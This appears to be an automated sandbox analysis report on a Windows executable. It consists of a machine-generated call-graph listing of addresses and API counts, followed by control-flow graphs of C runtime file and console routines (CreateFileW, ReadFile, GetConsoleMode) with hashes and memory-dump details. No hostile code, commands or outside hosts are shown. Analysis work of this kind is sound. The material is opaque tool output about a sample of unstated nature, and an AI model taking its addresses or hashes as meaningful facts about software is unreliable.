7ff6de45d5e0 wcsxfrm 94 API calls 76719->76720 76722 7ff6de455731 76720->76722 76722->76605 76768 7ff6de4568d0 117 API calls 76722->76768 76724->76719 76848 7ff6de45c860 94 API calls 3 library calls 76724->76848 76849 7ff6de45d7d0 94 API calls 2 library calls 76724->76849 76726 7ff6de4566cd 76725->76726 76727 7ff6de456872 76726->76727 76728 7ff6de456722 76726->76728 76732 7ff6de456746 76726->76732 76853 7ff6de456230 96 API calls wcsxfrm 76727->76853 76730 7ff6de45672d 76728->76730 76731 7ff6de45689e 76728->76731 76734 7ff6de45674b 76730->76734 76735 7ff6de456734 76730->76735 76854 7ff6de4562c0 96 API calls _free_nolock 76731->76854 76732->76597 76732->76611 76741 7ff6de455d60 76732->76741 76850 7ff6de4557b0 98 API calls 2 library calls 76734->76850 76736 7ff6de456816 76735->76736 76737 7ff6de45673f 76735->76737 76852 7ff6de4560e0 96 API calls 2 library calls 76736->76852 76737->76732 76851 7ff6de455840 98 API calls 2 library calls 76737->76851 76743 7ff6de455d96 76741->76743 76855 7ff6de463f90 76743->76855 76745 7ff6de455e96 76747 7ff6de455300 96 API calls 76745->76747 76749 7ff6de455ea8 76747->76749 76748 7ff6de455e01 wcsxfrm 76750 7ff6de455e76 76748->76750 76751 7ff6de455e15 wcsxfrm 76748->76751 76749->76611 76752 7ff6de45b4e0 wcsxfrm 94 API calls 76750->76752 76755 7ff6de455e49 76751->76755 76878 7ff6de45cfa0 94 API calls 2 library calls 76751->76878 76757 7ff6de455e58 wcsxfrm 76752->76757 76756 7ff6de45b4e0 wcsxfrm 94 API calls 76755->76756 76756->76757 76868 7ff6de455430 76757->76868 76758->76597 76759->76599 76761 7ff6de45d600 wcsxfrm _free_nolock 76760->76761 76762 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 76761->76762 76763 7ff6de45d621 _free_nolock 76762->76763 76764 7ff6de46f8b0 wcsxfrm 94 API calls 76763->76764 76765 7ff6de45d647 _free_nolock 76764->76765 76766 7ff6de45d654 _free_nolock 76765->76766 77130 7ff6de452420 94 API calls strrchr 76765->77130 76766->76596 76768->76605 76769->76607 76770->76615 76771->76597 76773 7ff6de51a205 76772->76773 76777 7ff6de456b2e 76772->76777 76774 7ff6de51aef8 _get_daylight 14 API calls 76773->76774 76775 7ff6de51a20a 76774->76775 77131 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76775->77131 76778 7ff6de51a548 76777->76778 76779 7ff6de51a55e 76778->76779 76780 7ff6de51a551 76778->76780 76782 7ff6de51aef8 _get_daylight 14 API calls 76779->76782 76783 7ff6de456b35 76779->76783 76781 7ff6de51aef8 _get_daylight 14 API calls 76780->76781 76781->76783 76784 7ff6de51a595 76782->76784 76783->76622 76783->76623 77132 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76784->77132 76786->76626 76787->76628 76788->76597 76789->76597 76809 7ff6de45b5f0 76790->76809 76792 7ff6de45b4e0 wcsxfrm 94 API calls 76799 7ff6de464b95 wcsxfrm _free_nolock 76792->76799 76793 7ff6de464ca8 76794 7ff6de45b4e0 wcsxfrm 94 API calls 76793->76794 76796 7ff6de464cb7 76794->76796 76796->76714 76797 7ff6de45c7a0 94 API calls _free_nolock 76797->76799 76798 7ff6de45b5f0 wcsxfrm 94 API calls 76798->76799 76799->76792 76799->76793 76799->76796 76799->76797 76799->76798 76813 7ff6de45d0c0 76799->76813 76819 7ff6de45d4e0 94 API calls 3 library calls 76799->76819 76802 7ff6de45ca3f task _mbsncpy_s 76801->76802 76844 7ff6de46ea50 76802->76844 76804 7ff6de45ca64 task _free_nolock 76805 7ff6de45cb36 76804->76805 76847 7ff6de45ad60 94 API calls _free_nolock 76804->76847 76805->76708 76807->76708 76808->76708 76810 7ff6de45b60b _free_nolock 76809->76810 76811 7ff6de45b65b 76810->76811 76820 7ff6de45ad60 94 API calls _free_nolock 76810->76820 76811->76799 76814 7ff6de45d0ee _mbsncpy_s 76813->76814 76821 7ff6de46c600 76814->76821 76816 7ff6de45d15b 76816->76799 76817 7ff6de45d10b _free_nolock 76817->76816 76825 7ff6de45ad60 94 API calls _free_nolock 76817->76825 76819->76799 76820->76811 76822 7ff6de46c619 __ExceptionPtrDestroy 76821->76822 76826 7ff6de46c5a0 76822->76826 76824 7ff6de46c67d 76824->76817 76825->76816 76829 7ff6de46dff0 76826->76829 76828 7ff6de46c5c5 wcsxfrm 76828->76824 76830 7ff6de46e0cc 76829->76830 76831 7ff6de46e00d 76829->76831 76832 7ff6de468da0 task 94 API calls 76830->76832 76831->76830 76833 7ff6de46e023 76831->76833 76836 7ff6de46e0db 76832->76836 76834 7ff6de468da0 task 94 API calls 76833->76834 76838 7ff6de46e03c 76834->76838 76835 7ff6de46e17d 76840 7ff6de468d00 _free_nolock 94 API calls 76835->76840 76836->76835 76836->76838 76842 7ff6de460950 94 API calls strrchr 76836->76842 76837 7ff6de46e1c7 76837->76828 76838->76837 76843 7ff6de46de50 94 API calls 2 library calls 76838->76843 76840->76838 76842->76835 76843->76837 76845 7ff6de468da0 task 94 API calls 76844->76845 76846 7ff6de46ea7b 76845->76846 76846->76804 76847->76805 76848->76724 76849->76724 76850->76732 76851->76732 76852->76732 76853->76732 76854->76732 76879 7ff6de464050 76855->76879 76857 7ff6de455dd4 76857->76745 76858 7ff6de45cde0 76857->76858 76859 7ff6de45ce00 wcsxfrm _free_nolock 76858->76859 76860 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 76859->76860 76861 7ff6de45ce21 _free_nolock 76860->76861 77096 7ff6de46f6e0 76861->77096 76863 7ff6de45ce47 76865 7ff6de45ce8a _free_nolock 76863->76865 77103 7ff6de452420 94 API calls strrchr 76863->77103 76866 7ff6de45cf04 76865->76866 77104 7ff6de45ad60 94 API calls _free_nolock 76865->77104 76866->76748 76869 7ff6de45544c 76868->76869 76870 7ff6de45ca10 task 94 API calls 76869->76870 76871 7ff6de455468 wcsxfrm 76870->76871 77107 7ff6de51a97c 76871->77107 76876 7ff6de51a97c 17 API calls 76877 7ff6de4554c8 wcsxfrm 76876->76877 76877->76745 76878->76751 76880 7ff6de464083 76879->76880 76883 7ff6de4640f5 _wcsupr_s 76879->76883 76907 7ff6de51b114 76880->76907 76926 7ff6de463e80 76883->76926 76884 7ff6de4640d9 76952 7ff6de45c990 94 API calls 2 library calls 76884->76952 76885 7ff6de4640a4 76887 7ff6de51aef8 _get_daylight 14 API calls 76885->76887 76890 7ff6de4640a9 76887->76890 76889 7ff6de46413f 76932 7ff6de51b02c 76889->76932 76950 7ff6de51b448 23 API calls 3 library calls 76890->76950 76894 7ff6de4640b0 76951 7ff6de45c990 94 API calls 2 library calls 76894->76951 76895 7ff6de464155 76898 7ff6de51aef8 _get_daylight 14 API calls 76895->76898 76897 7ff6de4641e3 _wcsupr_s 76901 7ff6de4640cf _handle_error 76897->76901 76938 7ff6de51af9c 76897->76938 76900 7ff6de46419e 76898->76900 76953 7ff6de51b448 23 API calls 3 library calls 76900->76953 76901->76857 76903 7ff6de4641a5 76954 7ff6de45c990 94 API calls 2 library calls 76903->76954 76905 7ff6de4641c7 76905->76901 76906 7ff6de51af9c _wcsupr_s 57 API calls 76905->76906 76906->76901 76908 7ff6de51b058 76907->76908 76909 7ff6de51b075 76908->76909 76912 7ff6de51b0a1 76908->76912 76910 7ff6de51aef8 _get_daylight 14 API calls 76909->76910 76911 7ff6de51b07a 76910->76911 76967 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76911->76967 76914 7ff6de51b0a6 76912->76914 76915 7ff6de51b0b3 76912->76915 76916 7ff6de51aef8 _get_daylight 14 API calls 76914->76916 76955 7ff6de52d698 76915->76955 76919 7ff6de464097 76916->76919 76919->76884 76919->76885 76920 7ff6de51b0c7 76922 7ff6de51aef8 _get_daylight 14 API calls 76920->76922 76921 7ff6de51b0d4 76962 7ff6de52dabc 76921->76962 76922->76919 76924 7ff6de51b0e8 _wcsupr_s 76968 7ff6de501c84 LeaveCriticalSection 76924->76968 76927 7ff6de463ec6 _mbsncpy_s 76926->76927 76928 7ff6de453037 _mbsncpy_s 94 API calls 76927->76928 76929 7ff6de463f2b 76928->76929 77080 7ff6de4773c0 76929->77080 76931 7ff6de463f41 _mbsncpy_s 76931->76889 76933 7ff6de51b035 76932->76933 76935 7ff6de46414d 76932->76935 76934 7ff6de51aef8 _get_daylight 14 API calls 76933->76934 76936 7ff6de51b03a 76934->76936 76935->76895 76935->76897 77093 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76936->77093 76939 7ff6de51afd1 76938->76939 76940 7ff6de51afb3 76938->76940 76941 7ff6de51afc3 _wcsupr_s 76939->76941 77094 7ff6de501c78 EnterCriticalSection 76939->77094 76942 7ff6de51aef8 _get_daylight 14 API calls 76940->76942 76941->76901 76944 7ff6de51afb8 76942->76944 77095 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76944->77095 76946 7ff6de51afe7 76947 7ff6de51af18 _wcsupr_s 55 API calls 76946->76947 76948 7ff6de51aff0 76947->76948 76949 7ff6de501c84 _fread_nolock LeaveCriticalSection 76948->76949 76949->76941 76950->76894 76951->76901 76952->76883 76953->76903 76954->76905 76969 7ff6de5291ac EnterCriticalSection 76955->76969 76957 7ff6de52d6af 76958 7ff6de52d70c _wcsupr_s 17 API calls 76957->76958 76959 7ff6de52d6ba 76958->76959 76960 7ff6de529200 _isindst LeaveCriticalSection 76959->76960 76961 7ff6de51b0bd 76960->76961 76961->76920 76961->76921 76970 7ff6de52d7f8 76962->76970 76965 7ff6de52db16 76965->76924 76967->76919 76976 7ff6de52d822 _wcsupr_s 76970->76976 76971 7ff6de52d9d5 76972 7ff6de51aef8 _get_daylight 14 API calls 76971->76972 76975 7ff6de52d9de 76971->76975 76973 7ff6de52da9b 76972->76973 76988 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76973->76988 76975->76965 76982 7ff6de531dd8 76975->76982 76976->76971 76985 7ff6de53b0e4 26 API calls 3 library calls 76976->76985 76978 7ff6de52da36 76978->76971 76986 7ff6de53b0e4 26 API calls 3 library calls 76978->76986 76980 7ff6de52da57 76980->76971 76987 7ff6de53b0e4 26 API calls 3 library calls 76980->76987 76989 7ff6de531698 76982->76989 76985->76978 76986->76980 76987->76971 76988->76975 76990 7ff6de5316cd 76989->76990 76991 7ff6de5316af 76989->76991 76990->76991 76994 7ff6de5316e9 76990->76994 76992 7ff6de51aef8 _get_daylight 14 API calls 76991->76992 76993 7ff6de5316b4 76992->76993 77011 7ff6de528b14 23 API calls _invalid_parameter_noinfo 76993->77011 77000 7ff6de531cc0 76994->77000 76997 7ff6de5316c0 76997->76965 77001 7ff6de503ea8 _Wcsftime 26 API calls 77000->77001 77002 7ff6de531d13 77001->77002 77005 7ff6de531d23 77002->77005 77078 7ff6de5295a0 5 API calls try_get_function 77002->77078 77013 7ff6de524f28 77005->77013 77007 7ff6de531d7b 77009 7ff6de531714 77007->77009 77079 7ff6de529294 14 API calls 2 library calls 77007->77079 77009->76997 77012 7ff6de537978 LeaveCriticalSection 77009->77012 77011->76997 77014 7ff6de524f51 77013->77014 77015 7ff6de524f73 77013->77015 77018 7ff6de529294 __free_lconv_mon 14 API calls 77014->77018 77026 7ff6de524f5f 77014->77026 77016 7ff6de524f77 77015->77016 77017 7ff6de524fcc 77015->77017 77020 7ff6de524f8b 77016->77020 77022 7ff6de529294 __free_lconv_mon 14 API calls 77016->77022 77016->77026 77019 7ff6de532ff4 wcsftime MultiByteToWideChar 77017->77019 77018->77026 77030 7ff6de524fe7 77019->77030 77023 7ff6de52a290 wcsftime 15 API calls 77020->77023 77021 7ff6de524fee GetLastError 77024 7ff6de51ae88 wcsftime 14 API calls 77021->77024 77022->77020 77023->77026 77028 7ff6de524ffb 77024->77028 77025 7ff6de525027 77025->77026 77027 7ff6de532ff4 wcsftime MultiByteToWideChar 77025->77027 77026->77007 77035 7ff6de531e0c 77026->77035 77031 7ff6de52506f 77027->77031 77032 7ff6de51aef8 _get_daylight 14 API calls 77028->77032 77029 7ff6de52501b 77034 7ff6de52a290 wcsftime 15 API calls 77029->77034 77030->77021 77030->77025 77030->77029 77033 7ff6de529294 __free_lconv_mon 14 API calls 77030->77033 77031->77021 77031->77026 77032->77026 77033->77029 77034->77025 77036 7ff6de5319f0 tmpfile 23 API calls 77035->77036 77037 7ff6de531e53 77036->77037 77038 7ff6de531e99 77037->77038 77039 7ff6de531e81 77037->77039 77041 7ff6de5379a0 tmpfile 18 API calls 77038->77041 77040 7ff6de51aed8 _fread_nolock 14 API calls 77039->77040 77042 7ff6de531e86 77040->77042 77043 7ff6de531e9e 77041->77043 77049 7ff6de51aef8 _get_daylight 14 API calls 77042->77049 77044 7ff6de531ebe CreateFileW 77043->77044 77045 7ff6de531ea5 77043->77045 77047 7ff6de531f29 77044->77047 77048 7ff6de531fa4 GetFileType 77044->77048 77046 7ff6de51aed8 _fread_nolock 14 API calls 77045->77046 77050 7ff6de531eaa 77046->77050 77051 7ff6de531f71 GetLastError 77047->77051 77056 7ff6de531f37 CreateFileW 77047->77056 77053 7ff6de531fb1 GetLastError 77048->77053 77054 7ff6de532002 77048->77054 77052 7ff6de531e92 77049->77052 77055 7ff6de51aef8 _get_daylight 14 API calls 77050->77055 77057 7ff6de51ae88 wcsftime 14 API calls 77051->77057 77052->77007 77058 7ff6de51ae88 wcsftime 14 API calls 77053->77058 77061 7ff6de5378b8 tmpfile 15 API calls 77054->77061 77055->77042 77056->77048 77056->77051 77057->77042 77059 7ff6de531fc0 CloseHandle 77058->77059 77059->77042 77060 7ff6de531ff2 77059->77060 77062 7ff6de51aef8 _get_daylight 14 API calls 77060->77062 77063 7ff6de532024 77061->77063 77064 7ff6de531ff7 77062->77064 77065 7ff6de532074 77063->77065 77067 7ff6de531bfc tmpfile 62 API calls 77063->77067 77064->77042 77066 7ff6de53175c tmpfile 62 API calls 77065->77066 77069 7ff6de53207b 77065->77069 77068 7ff6de5320b2 77066->77068 77067->77065 77068->77069 77071 7ff6de5320bc 77068->77071 77070 7ff6de52d5d8 tmpfile 26 API calls 77069->77070 77070->77052 77071->77052 77072 7ff6de53213c CloseHandle CreateFileW 77071->77072 77073 7ff6de5321b1 77072->77073 77074 7ff6de532183 GetLastError 77072->77074 77073->77052 77075 7ff6de51ae88 wcsftime 14 API calls 77074->77075 77076 7ff6de532190 77075->77076 77077 7ff6de537ae0 tmpfile 15 API calls 77076->77077 77077->77073 77078->77005 77079->77009 77087 7ff6de476f90 77080->77087 77083 7ff6de476f90 _mbsncpy_s 10 API calls 77084 7ff6de47742c 77083->77084 77090 7ff6de477010 77084->77090 77089 7ff6de478b40 10 API calls 77087->77089 77088 7ff6de476fda 77088->77083 77089->77088 77091 7ff6de476f90 _mbsncpy_s 10 API calls 77090->77091 77092 7ff6de47704b 77091->77092 77092->76931 77093->76935 77095->76941 77097 7ff6de46f707 wcsxfrm 77096->77097 77099 7ff6de46f81e 77097->77099 77102 7ff6de46f727 wcsxfrm 77097->77102 77105 7ff6de460a70 94 API calls 2 library calls 77099->77105 77100 7ff6de46f7f0 wcsxfrm 77100->76863 77102->77100 77106 7ff6de460950 94 API calls strrchr 77102->77106 77103->76865 77104->76866 77105->77100 77106->77100 77108 7ff6de51a9a4 77107->77108 77117 7ff6de51aa57 memcpy_s 77107->77117 77109 7ff6de51aa67 77108->77109 77111 7ff6de51a9bb 77108->77111 77114 7ff6de52ab1c _invalid_parameter_noinfo 14 API calls 77109->77114 77109->77117 77110 7ff6de51aef8 _get_daylight 14 API calls 77124 7ff6de455487 77110->77124 77129 7ff6de5291ac EnterCriticalSection 77111->77129 77115 7ff6de51aa83 77114->77115 77115->77117 77120 7ff6de52a290 wcsftime 15 API calls 77115->77120 77117->77110 77117->77124 77120->77117 77125 7ff6de45dd30 77124->77125 77126 7ff6de45dd6f wcsxfrm 77125->77126 77127 7ff6de452f8a 94 API calls 77126->77127 77128 7ff6de4554b8 77127->77128 77128->76876 77130->76766 77131->76777 77132->76783 77134 7ff6de4a5945 77133->77134 77138 7ff6de4a598f _free_nolock 77133->77138 77135 7ff6de4a1768 77134->77135 77134->77138 77144 7ff6de482a30 94 API calls type_info::_name_internal_method 77134->77144 77139 7ff6de4deda0 77135->77139 77138->77135 77145 7ff6de461310 94 API calls __ExceptionPtrDestroy 77138->77145 77146 7ff6de4df000 GetLastError 77139->77146 77141 7ff6de4dedd3 77152 7ff6de4df340 94 API calls 2 library calls 77141->77152 77143 7ff6de4a17e7 77143->76551 77144->77138 77145->77135 77153 7ff6de4defa0 77146->77153 77149 7ff6de4df05d SetLastError 77149->77141 77150 7ff6de4df047 77157 7ff6de4dee80 96 API calls 2 library calls 77150->77157 77152->77143 77154 7ff6de4defb8 77153->77154 77156 7ff6de4defd2 LoadLibraryExA 77154->77156 77158 7ff6de483010 94 API calls strrchr 77154->77158 77156->77149 77156->77150 77157->77149 77158->77156 77159 7ff6de451cf0 77162 7ff6de46ebc0 77159->77162 77163 7ff6de46ebef 77162->77163 77168 7ff6de46efd0 77163->77168 77165 7ff6de451d19 77167 7ff6de46ec11 77167->77165 77171 7ff6de46edf0 77167->77171 77169 7ff6de468da0 task 94 API calls 77168->77169 77170 7ff6de46f001 77169->77170 77170->77167 77172 7ff6de46ee1a 77171->77172 77173 7ff6de468d00 _free_nolock 94 API calls 77172->77173 77174 7ff6de46ee52 77172->77174 77173->77174 77174->77167 77175 7ff6de454a01 77176 7ff6de454a0c 77175->77176 77179 7ff6de454a30 77175->77179 77176->77179 77180 7ff6de462dc0 77176->77180 77194 7ff6de4740a0 96 API calls _get_daylight 77179->77194 77181 7ff6de51aef8 _get_daylight 14 API calls 77180->77181 77182 7ff6de462dd3 GetLastError 77181->77182 77183 7ff6de462e77 77182->77183 77184 7ff6de462ee6 77183->77184 77185 7ff6de473fc0 94 API calls 77183->77185 77193 7ff6de462f35 wcsxfrm 77184->77193 77195 7ff6de463a80 98 API calls _handle_error 77184->77195 77185->77184 77186 7ff6de463074 77188 7ff6de51aef8 _get_daylight 14 API calls 77186->77188 77189 7ff6de463079 SetLastError 77188->77189 77189->77179 77191 7ff6de463005 77191->77186 77197 7ff6de463a80 98 API calls _handle_error 77191->77197 77193->77191 77196 7ff6de463a80 98 API calls _handle_error 77193->77196 77194->77179 77195->77193 77196->77191 77197->77186 77198 7ff6de451a21 77201 7ff6de46fd90 77198->77201 77200 7ff6de451a47 77202 7ff6de46fdb8 77201->77202 77203 7ff6de46feb0 wcsxfrm 77202->77203 77207 7ff6de4702a6 77202->77207 77219 7ff6de46ff71 wcsxfrm _mbsncpy_s 77202->77219 77221 7ff6de46f2a0 77202->77221 77225 7ff6de46f2f0 77202->77225 77229 7ff6de460950 94 API calls strrchr 77202->77229 77203->77219 77228 7ff6de460a70 94 API calls 2 library calls 77203->77228 77208 7ff6de4702fd 77207->77208 77209 7ff6de4702b7 77207->77209 77212 7ff6de47037d 77208->77212 77217 7ff6de470333 77208->77217 77230 7ff6de48e9c0 94 API calls 77209->77230 77214 7ff6de470396 77212->77214 77215 7ff6de470383 77212->77215 77213 7ff6de4702f8 77213->77200 77233 7ff6de4a2fe0 94 API calls type_info::_name_internal_method 77214->77233 77232 7ff6de481a40 94 API calls 2 library calls 77215->77232 77231 7ff6de48e9c0 94 API calls 77217->77231 77219->77200 77222 7ff6de46f2d5 77221->77222 77223 7ff6de46f2c7 77221->77223 77222->77202 77234 7ff6de48e3f0 77223->77234 77226 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 77225->77226 77227 7ff6de46f32a 77226->77227 77227->77202 77228->77219 77229->77202 77230->77213 77231->77213 77232->77213 77233->77213 77235 7ff6de48e413 77234->77235 77236 7ff6de48e575 77234->77236 77237 7ff6de48e467 77235->77237 77254 7ff6de460690 94 API calls 2 library calls 77235->77254 77239 7ff6de48e5bf 77236->77239 77255 7ff6de460690 94 API calls 2 library calls 77236->77255 77241 7ff6de48e4a6 77237->77241 77242 7ff6de48e48c 77237->77242 77247 7ff6de48f300 77239->77247 77245 7ff6de48e4a4 memcpy_s 77241->77245 77246 7ff6de48f300 type_info::_name_internal_method 94 API calls 77241->77246 77244 7ff6de48f300 type_info::_name_internal_method 94 API calls 77242->77244 77244->77245 77245->77222 77246->77245 77248 7ff6de48f34d 77247->77248 77249 7ff6de48f3eb 77248->77249 77250 7ff6de48f38d 77248->77250 77252 7ff6de468d00 _free_nolock 94 API calls 77249->77252 77251 7ff6de468d00 _free_nolock 94 API calls 77250->77251 77253 7ff6de48f3ab memcpy_s 77251->77253 77252->77253 77253->77245 77254->77237 77255->77239

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF6DE531E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff6de531e0c-7ff6de531e7f call 7ff6de5319f0 3 7ff6de531e99-7ff6de531ea3 call 7ff6de5379a0 0->3 4 7ff6de531e81-7ff6de531e8a call 7ff6de51aed8 0->4 9 7ff6de531ebe-7ff6de531f27 CreateFileW 3->9 10 7ff6de531ea5-7ff6de531ebc call 7ff6de51aed8 call 7ff6de51aef8 3->10 11 7ff6de531e8d-7ff6de531e94 call 7ff6de51aef8 4->11 13 7ff6de531f29-7ff6de531f2f 9->13 14 7ff6de531fa4-7ff6de531faf GetFileType 9->14 10->11 27 7ff6de5321d2-7ff6de5321f2 11->27 17 7ff6de531f71-7ff6de531f9f GetLastError call 7ff6de51ae88 13->17 18 7ff6de531f31-7ff6de531f35 13->18 20 7ff6de531fb1-7ff6de531fec GetLastError call 7ff6de51ae88 CloseHandle 14->20 21 7ff6de532002-7ff6de532009 14->21 17->11 18->17 25 7ff6de531f37-7ff6de531f6f CreateFileW 18->25 20->11 34 7ff6de531ff2-7ff6de531ffd call 7ff6de51aef8 20->34 23 7ff6de53200b-7ff6de53200f 21->23 24 7ff6de532011-7ff6de532014 21->24 30 7ff6de53201a-7ff6de53206b call 7ff6de5378b8 23->30 24->30 31 7ff6de532016 24->31 25->14 25->17 39 7ff6de53206d-7ff6de532079 call 7ff6de531bfc 30->39 40 7ff6de53208a-7ff6de5320ba call 7ff6de53175c 30->40 31->30 34->11 39->40 47 7ff6de53207b 39->47 45 7ff6de5320bc-7ff6de5320ff 40->45 46 7ff6de53207d-7ff6de532085 call 7ff6de52d5d8 40->46 48 7ff6de532121-7ff6de53212c 45->48 49 7ff6de532101-7ff6de532105 45->49 46->27 47->46 53 7ff6de5321d0 48->53 54 7ff6de532132-7ff6de532136 48->54 49->48 52 7ff6de532107-7ff6de53211c 49->52 52->48 53->27 54->53 55 7ff6de53213c-7ff6de532181 CloseHandle CreateFileW 54->55 56 7ff6de5321b6-7ff6de5321cb 55->56 57 7ff6de532183-7ff6de5321b1 GetLastError call 7ff6de51ae88 call 7ff6de537ae0 55->57 56->53 57->56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                                                                                              • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                                                                              • Instruction ID: 8d073d58fc75a8dfe4571935a5a6528fde14a680ec202961c715ddb5ec6ad971
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAC1A237B28E4985EB11CF69C5A01AC3761F769BD8B104326EE2E97795CF3AD461C340
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52E1DC Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff6de52e1dc-7ff6de52e202 63 7ff6de52e21d-7ff6de52e221 62->63 64 7ff6de52e204-7ff6de52e218 call 7ff6de51aed8 call 7ff6de51aef8 62->64 66 7ff6de52e227-7ff6de52e22e 63->66 67 7ff6de52e600-7ff6de52e60c call 7ff6de51aed8 call 7ff6de51aef8 63->67 82 7ff6de52e617 64->82 66->67 68 7ff6de52e234-7ff6de52e266 66->68 85 7ff6de52e612 call 7ff6de528b14 67->85 68->67 71 7ff6de52e26c-7ff6de52e273 68->71 74 7ff6de52e28c-7ff6de52e28f 71->74 75 7ff6de52e275-7ff6de52e287 call 7ff6de51aed8 call 7ff6de51aef8 71->75 80 7ff6de52e5fc-7ff6de52e5fe 74->80 81 7ff6de52e295-7ff6de52e297 74->81 75->85 83 7ff6de52e61a-7ff6de52e631 80->83 81->80 86 7ff6de52e29d-7ff6de52e2a0 81->86 82->83 85->82 86->75 89 7ff6de52e2a2-7ff6de52e2c8 86->89 91 7ff6de52e307-7ff6de52e30f 89->91 92 7ff6de52e2ca-7ff6de52e2cd 89->92 93 7ff6de52e2d9-7ff6de52e2f0 call 7ff6de51aed8 call 7ff6de51aef8 call 7ff6de528b14 91->93 94 7ff6de52e311-7ff6de52e339 call 7ff6de52a290 call 7ff6de529294 * 2 91->94 95 7ff6de52e2cf-7ff6de52e2d7 92->95 96 7ff6de52e2f5-7ff6de52e302 92->96 125 7ff6de52e490 93->125 127 7ff6de52e356-7ff6de52e387 call 7ff6de530728 94->127 128 7ff6de52e33b-7ff6de52e351 call 7ff6de51aef8 call 7ff6de51aed8 94->128 95->93 95->96 97 7ff6de52e38b-7ff6de52e39e 96->97 100 7ff6de52e41a-7ff6de52e424 call 7ff6de51a548 97->100 101 7ff6de52e3a0-7ff6de52e3a8 97->101 112 7ff6de52e42a-7ff6de52e43f 100->112 113 7ff6de52e4ae 100->113 101->100 106 7ff6de52e3aa-7ff6de52e3ac 101->106 106->100 110 7ff6de52e3ae-7ff6de52e3c5 106->110 110->100 115 7ff6de52e3c7-7ff6de52e3d3 110->115 112->113 117 7ff6de52e441-7ff6de52e453 GetConsoleMode 112->117 121 7ff6de52e4b3-7ff6de52e4d3 ReadFile 113->121 115->100 119 7ff6de52e3d5-7ff6de52e3d7 115->119 117->113 124 7ff6de52e455-7ff6de52e45d 117->124 119->100 126 7ff6de52e3d9-7ff6de52e3f1 119->126 122 7ff6de52e4d9-7ff6de52e4e1 121->122 123 7ff6de52e5c6-7ff6de52e5cf GetLastError 121->123 122->123 129 7ff6de52e4e7 122->129 132 7ff6de52e5ec-7ff6de52e5ef 123->132 133 7ff6de52e5d1-7ff6de52e5e7 call 7ff6de51aef8 call 7ff6de51aed8 123->133 124->121 131 7ff6de52e45f-7ff6de52e481 ReadConsoleW 124->131 134 7ff6de52e493-7ff6de52e49d call 7ff6de529294 125->134 126->100 135 7ff6de52e3f3-7ff6de52e3ff 126->135 127->97 128->125 137 7ff6de52e4ee-7ff6de52e503 129->137 139 7ff6de52e4a2-7ff6de52e4ac 131->139 140 7ff6de52e483 GetLastError 131->140 144 7ff6de52e489-7ff6de52e48b call 7ff6de51ae88 132->144 145 7ff6de52e5f5-7ff6de52e5f7 132->145 133->125 134->83 135->100 143 7ff6de52e401-7ff6de52e403 135->143 137->134 148 7ff6de52e505-7ff6de52e510 137->148 139->137 140->144 143->100 152 7ff6de52e405-7ff6de52e415 143->152 144->125 145->134 154 7ff6de52e537-7ff6de52e53f 148->154 155 7ff6de52e512-7ff6de52e52b call 7ff6de52dda0 148->155 152->100 158 7ff6de52e541-7ff6de52e553 154->158 159 7ff6de52e5b4-7ff6de52e5c1 call 7ff6de52db58 154->159 162 7ff6de52e530-7ff6de52e532 155->162 163 7ff6de52e5a7-7ff6de52e5af 158->163 164 7ff6de52e555 158->164 159->162 162->134 163->134 166 7ff6de52e55a-7ff6de52e561 164->166 167 7ff6de52e59d-7ff6de52e5a1 166->167 168 7ff6de52e563-7ff6de52e567 166->168 167->163 169 7ff6de52e569-7ff6de52e570 168->169 170 7ff6de52e583 168->170 169->170 172 7ff6de52e572-7ff6de52e576 169->172 171 7ff6de52e589-7ff6de52e599 170->171 171->166 173 7ff6de52e59b 171->173 172->170 174 